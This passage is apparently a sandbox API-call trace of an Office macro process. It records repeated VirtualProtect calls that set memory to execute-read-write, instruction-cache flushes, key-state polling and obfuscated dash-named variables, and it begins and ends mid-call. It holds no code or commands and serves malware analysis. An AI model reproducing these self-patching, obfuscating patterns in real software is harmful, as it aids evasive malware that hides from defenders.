GetCurrentProcess () returned 0xffffffff [0103.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0103.983] GetCurrentProcess () returned 0xffffffff [0103.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0103.983] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.983] GetCurrentProcess () returned 0xffffffff [0103.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0103.983] GetCurrentProcess () returned 0xffffffff [0103.983] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0103.983] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.984] GetCurrentProcess () returned 0xffffffff [0103.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0103.984] GetCurrentProcess () returned 0xffffffff [0103.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0103.984] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.984] GetCurrentProcess () returned 0xffffffff [0103.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0103.984] GetCurrentProcess () returned 0xffffffff [0103.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0103.985] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.985] GetCurrentProcess () returned 0xffffffff [0103.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0103.985] GetCurrentProcess () returned 0xffffffff [0103.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0103.985] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.985] GetCurrentProcess () returned 0xffffffff [0103.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0103.985] GetCurrentProcess () returned 0xffffffff [0103.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0103.986] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.986] GetCurrentProcess () returned 0xffffffff [0103.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0103.986] GetCurrentProcess () returned 0xffffffff [0103.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0103.986] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.986] GetCurrentProcess () returned 0xffffffff [0103.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0103.987] GetCurrentProcess () returned 0xffffffff [0103.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0103.987] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.987] GetCurrentProcess () returned 0xffffffff [0103.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0103.987] GetCurrentProcess () returned 0xffffffff [0103.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0103.987] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.988] GetCurrentProcess () returned 0xffffffff [0103.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0103.988] GetCurrentProcess () returned 0xffffffff [0103.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0103.988] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.988] GetCurrentProcess () returned 0xffffffff [0103.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0103.988] GetCurrentProcess () returned 0xffffffff [0103.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0103.988] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0103.989] GetCurrentProcess () returned 0xffffffff [0103.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0103.989] GetAsyncKeyState (vKey=3) returned 0 [0103.989] GetAsyncKeyState (vKey=3) returned 0 [0103.990] VarCmp (pvarLeft=0x197d98, pvarRight=0x197d88, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.990] CRetailMalloc_Alloc () returned 0xcac71d0 [0103.990] memcpy (in: _Dst=0xaf5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.990] memcpy (in: _Dst=0xaf5270, _Src=0x197524, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.991] memcpy (in: _Dst=0xaf5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52dbe, cbMultiByte=23, lpWideCharStr=0x197324, cchWideChar=24 | out: lpWideCharStr="—––—––—–—–—––—–—–———–—") returned 23 [0103.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32b96, cbMultiByte=23, lpWideCharStr=0x197384, cchWideChar=24 | out: lpWideCharStr="—––—––—–—–—––—–—–———–—") returned 23 [0103.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32b96, cbMultiByte=23, lpWideCharStr=0x197384, cchWideChar=24 | out: lpWideCharStr="—––—––—–—–—––—–—–———–—") returned 23 [0103.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32b96, cbMultiByte=23, lpWideCharStr=0x197384, cchWideChar=24 | out: lpWideCharStr="—––—––—–—–—––—–—–———–—") returned 23 [0103.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32b96, cbMultiByte=23, lpWideCharStr=0x197384, cchWideChar=24 | out: lpWideCharStr="—––—––—–—–—––—–—–———–—") returned 23 [0103.992] CRetailMalloc_Alloc () returned 0xc823018 [0103.992] _mbscpy_s (in: _Dst=0xc823018, _DstSizeInBytes=0x17, _Src=0x9c32b96 | out: _Dst=0xc823018) returned 0x0 [0103.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10ada, cbMultiByte=30, lpWideCharStr=0x197394, cchWideChar=31 | out: lpWideCharStr="_B_var_—––—––—–—–—––—–—–———–—") returned 30 [0103.992] _mbscpy_s (in: _Dst=0x1973fc, _DstSizeInBytes=0x17, _Src=0x9c32b96 | out: _Dst=0x1973fc) returned 0x0 [0103.992] CRetailMalloc_Free () returned 0x1 [0103.993] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.993] memcpy (in: _Dst=0xaf5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.993] memcpy (in: _Dst=0xaf5168, _Src=0x197374, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.993] memcpy (in: _Dst=0xaf5168, _Src=0x197374, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.993] CRetailMalloc_Realloc () returned 0xcad0d58 [0103.994] memcpy (in: _Dst=0xaf5168, _Src=0x197374, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.994] memcpy (in: _Dst=0xaf5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.994] memcpy (in: _Dst=0xaf5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.994] memcpy (in: _Dst=0xcac7250, _Src=0x1975a4, _Size=0x18 | out: _Dst=0xcac7250) returned 0xcac7250 [0103.994] CRetailMalloc_Realloc () returned 0xcac71d0 [0103.994] CRetailMalloc_Free () returned 0x1 [0103.994] GetCurrentProcess () returned 0xffffffff [0103.994] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0103.994] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.031] GetCurrentProcess () returned 0xffffffff [0104.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0104.031] GetCurrentProcess () returned 0xffffffff [0104.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0104.031] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.032] GetCurrentProcess () returned 0xffffffff [0104.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0104.032] GetCurrentProcess () returned 0xffffffff [0104.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0104.032] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.033] GetCurrentProcess () returned 0xffffffff [0104.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0104.033] GetCurrentProcess () returned 0xffffffff [0104.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0104.033] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.033] GetCurrentProcess () returned 0xffffffff [0104.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0104.033] GetCurrentProcess () returned 0xffffffff [0104.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0104.033] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.034] GetCurrentProcess () returned 0xffffffff [0104.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0104.034] GetCurrentProcess () returned 0xffffffff [0104.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0104.034] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.034] GetCurrentProcess () returned 0xffffffff [0104.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0104.034] GetCurrentProcess () returned 0xffffffff [0104.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0104.034] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.034] GetCurrentProcess () returned 0xffffffff [0104.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0104.035] GetCurrentProcess () returned 0xffffffff [0104.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0104.035] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.035] GetCurrentProcess () returned 0xffffffff [0104.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0104.035] GetCurrentProcess () returned 0xffffffff [0104.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0104.035] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.035] GetCurrentProcess () returned 0xffffffff [0104.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0104.035] GetCurrentProcess () returned 0xffffffff [0104.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0104.036] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.036] GetCurrentProcess () returned 0xffffffff [0104.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0104.036] GetCurrentProcess () returned 0xffffffff [0104.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0104.036] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.036] GetCurrentProcess () returned 0xffffffff [0104.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0104.036] GetCurrentProcess () returned 0xffffffff [0104.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0104.036] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.037] GetCurrentProcess () returned 0xffffffff [0104.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0104.037] GetCurrentProcess () returned 0xffffffff [0104.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0104.037] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.037] GetCurrentProcess () returned 0xffffffff [0104.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0104.037] GetCurrentProcess () returned 0xffffffff [0104.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0104.037] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.038] GetCurrentProcess () returned 0xffffffff [0104.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0104.038] GetCurrentProcess () returned 0xffffffff [0104.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0104.038] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.038] GetCurrentProcess () returned 0xffffffff [0104.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0104.038] GetCurrentProcess () returned 0xffffffff [0104.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0104.038] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.039] GetCurrentProcess () returned 0xffffffff [0104.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0104.039] GetCurrentProcess () returned 0xffffffff [0104.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0104.039] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.039] GetCurrentProcess () returned 0xffffffff [0104.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0104.039] GetCurrentProcess () returned 0xffffffff [0104.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0104.039] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.040] GetCurrentProcess () returned 0xffffffff [0104.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0104.040] GetCurrentProcess () returned 0xffffffff [0104.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0104.040] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.041] GetCurrentProcess () returned 0xffffffff [0104.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0104.041] GetCurrentProcess () returned 0xffffffff [0104.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0104.041] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.041] GetCurrentProcess () returned 0xffffffff [0104.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0104.041] GetCurrentProcess () returned 0xffffffff [0104.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0104.042] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.042] GetCurrentProcess () returned 0xffffffff [0104.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0104.042] GetCurrentProcess () returned 0xffffffff [0104.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0104.042] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.043] GetCurrentProcess () returned 0xffffffff [0104.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0104.043] GetCurrentProcess () returned 0xffffffff [0104.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0104.043] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.044] GetCurrentProcess () returned 0xffffffff [0104.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0104.044] GetCurrentProcess () returned 0xffffffff [0104.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0104.044] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.044] GetCurrentProcess () returned 0xffffffff [0104.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0104.044] GetCurrentProcess () returned 0xffffffff [0104.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0104.044] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.045] GetCurrentProcess () returned 0xffffffff [0104.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0104.045] GetCurrentProcess () returned 0xffffffff [0104.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0104.045] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.045] GetCurrentProcess () returned 0xffffffff [0104.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0104.045] GetCurrentProcess () returned 0xffffffff [0104.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0104.046] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.046] GetCurrentProcess () returned 0xffffffff [0104.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0104.046] GetCurrentProcess () returned 0xffffffff [0104.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0104.046] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.047] GetCurrentProcess () returned 0xffffffff [0104.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0104.047] GetCurrentProcess () returned 0xffffffff [0104.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0104.047] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.047] GetCurrentProcess () returned 0xffffffff [0104.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0104.047] GetCurrentProcess () returned 0xffffffff [0104.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0104.048] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.048] GetCurrentProcess () returned 0xffffffff [0104.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0104.048] GetCurrentProcess () returned 0xffffffff [0104.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0104.048] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0104.049] GetCurrentProcess () returned 0xffffffff [0104.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0104.050] GetAsyncKeyState (vKey=3) returned 0 [0104.050] CRetailMalloc_Alloc () returned 0xcad4d60 [0104.050] memcpy (in: _Dst=0xaf5168, _Src=0x1973fc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.050] memcpy (in: _Dst=0xcad4d80, _Src=0x197464, _Size=0x18 | out: _Dst=0xcad4d80) returned 0xcad4d80 [0104.050] CRetailMalloc_Realloc () returned 0xcad4d60 [0104.050] CRetailMalloc_Free () returned 0x1 [0104.050] GetCurrentProcess () returned 0xffffffff [0104.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0104.050] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.051] GetCurrentProcess () returned 0xffffffff [0104.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0104.051] GetCurrentProcess () returned 0xffffffff [0104.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0104.051] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.051] GetCurrentProcess () returned 0xffffffff [0104.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0104.051] GetCurrentProcess () returned 0xffffffff [0104.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0104.052] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.052] GetCurrentProcess () returned 0xffffffff [0104.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0104.052] GetCurrentProcess () returned 0xffffffff [0104.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0104.052] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.053] GetCurrentProcess () returned 0xffffffff [0104.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0104.053] GetCurrentProcess () returned 0xffffffff [0104.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0104.053] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.053] GetCurrentProcess () returned 0xffffffff [0104.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0104.053] GetCurrentProcess () returned 0xffffffff [0104.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0104.053] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.054] GetCurrentProcess () returned 0xffffffff [0104.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0104.054] GetCurrentProcess () returned 0xffffffff [0104.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0104.054] VirtualProtect (in: 